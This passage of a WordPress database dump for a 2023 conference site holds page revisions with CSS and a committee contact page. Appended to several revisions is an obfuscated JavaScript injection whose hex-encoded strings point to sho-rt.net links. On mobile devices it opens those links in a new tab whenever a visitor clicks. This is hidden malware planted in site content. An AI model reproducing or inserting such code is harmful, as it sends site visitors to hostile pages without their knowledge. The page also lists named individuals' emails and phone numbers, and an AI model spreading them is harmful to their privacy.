Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 10:44:04','2023-06-27 10:44:04','',4823,'https://gsw2023.com/?p=4913',0,'revision','',0),
(4915,4,'2023-06-27 10:45:00','2023-06-27 10:45:00','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 10:45:00','2023-06-27 10:45:00','',4823,'https://gsw2023.com/?p=4915',0,'revision','',0),
(4916,4,'2023-06-27 10:46:43','2023-06-27 10:46:43','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Local Web director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687862786456{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687862774089{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| 